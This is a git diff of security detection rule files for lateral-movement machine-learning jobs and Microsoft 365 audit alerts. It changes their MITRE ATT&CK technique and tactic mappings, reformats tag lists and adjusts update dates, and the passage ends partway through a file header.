"MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml index 2a44e9de8ee..b4d4e4a8ff6 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,13 +96,14 @@ Machine learning models in security environments analyze file transfer patterns - Enhance monitoring and logging for unusual file transfer activities and remote access attempts to improve early detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml index cb00727c844..bc0292876e8 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating leg - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml index 2fba6b44191..04f5ad44500 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,13 +96,14 @@ The 'Unusual Remote File Directory' detection leverages machine learning to iden - Update detection mechanisms and rules to enhance monitoring of less common directories and improve the detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml index 3f4e83cc4ef..8cc42195af1 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -95,13 +95,14 @@ The detection of unusual remote file extensions leverages machine learning to id - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml index cf9b04d1252..027b7598adf 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) is a common tool for remote management, but advers - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes, ensuring early detection of future attempts.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml index 1534efbce1e..e511ab60262 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -95,18 +95,14 @@ Remote Desktop Protocol (RDP) is crucial for remote management and troubleshooti - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes in the future, ensuring quick identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml index 39d87498cf6..d5bcf1bf496 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -94,18 +94,14 @@ Remote Desktop Protocol (RDP) allows users to connect to other computers over a - Enhance monitoring and detection capabilities for RDP sessions by implementing stricter access controls and logging to detect similar anomalies in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml index 009b8ed2300..d66e8ddd4dc 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -52,7 +52,13 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -91,26 +97,14 @@ Remote file transfer technologies facilitate data sharing across networks, essen - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml index f6ba1598c0b..be5de02f9db 100644 --- a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml +++ b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) enables remote access to systems, crucial for IT m - Implement enhanced monitoring on the affected system and related network segments to detect any further suspicious activities or attempts at unauthorized access.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml index ba63cde5f17..e79eaca74da 100644 --- a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml +++ b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -67,7 +67,19 @@ references = [ risk_score = 47 rule_id = "0e524fa6-eed3-11ef-82b4-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Storage", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: SharePoint", "Data Source: OneDrive", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Storage", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: SharePoint", + "Data Source: OneDrive", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -134,3 +146,11 @@ reference = "https://attack.mitre.org/techniques/T1530/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml index 517692da649..f2e5eb1098f 100644 --- a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml +++ b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -62,7 +62,16 @@ references = [ risk_score = 47 rule_id = "491651da-125b-11f1-af7d-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -77,23 +86,31 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index 1b66c64fc1b..bcad5515b25 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -50,7 +50,15 @@ references = [ risk_score = 73 rule_id = "fcd2e4be-6ec4-482f-9222-6245367cd738" severity = "high" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -67,31 +75,48 @@ sequence by related.user with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index 9ee8b45d02c..d9d60e52102 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/10" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -127,18 +127,29 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" +[[rule.threat.technique.subtechnique]] +id = "T1110.004" +name = "Credential Stuffing" +reference = "https://attack.mitre.org/techniques/T1110/004/" + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml index 0dc0777f315..692780a6416 100644 --- a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml +++ b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -188,18 +188,48 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml index 943ff042f2e..8574d32b915 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] @@ -80,16 +80,11 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index df05815d262..1a63debc029 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/13" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ references = ["https://twitter.com/misconfig/status/1476144066807140355"] risk_score = 47 rule_id = "675239ea-c1bc-4467-a6d3-b9e2cc7f676d" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Tactic: Initial Access", "Tactic: Defense Evasion", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -75,18 +75,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml index 1fce09f533f..9b65cad7179 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -84,18 +84,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml index 6fb8a45115b..aeb5c15781c 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -83,18 +83,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml index 0ba6cba943d..42f4af5cf54 100644 --- a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -83,18 +83,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml index e6ea0aaf6ec..7b81c5b2bd0 100644 --- a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml +++ b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/27" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [rule] author = ["Elastic", "Austin Songer"] @@ -107,13 +107,17 @@ event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml index 51150629c75..98575d9075a 100644 --- a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml +++ b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -80,13 +80,14 @@ o365.audit.NewValue:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml index 9c9c726a77e..a83611522d5 100644 --- a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml +++ b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] author = ["Elastic"] @@ -78,13 +78,14 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml index ea4d8372529..1e70dfb7fd2 100644 --- a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml +++ b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml @@ -2,7 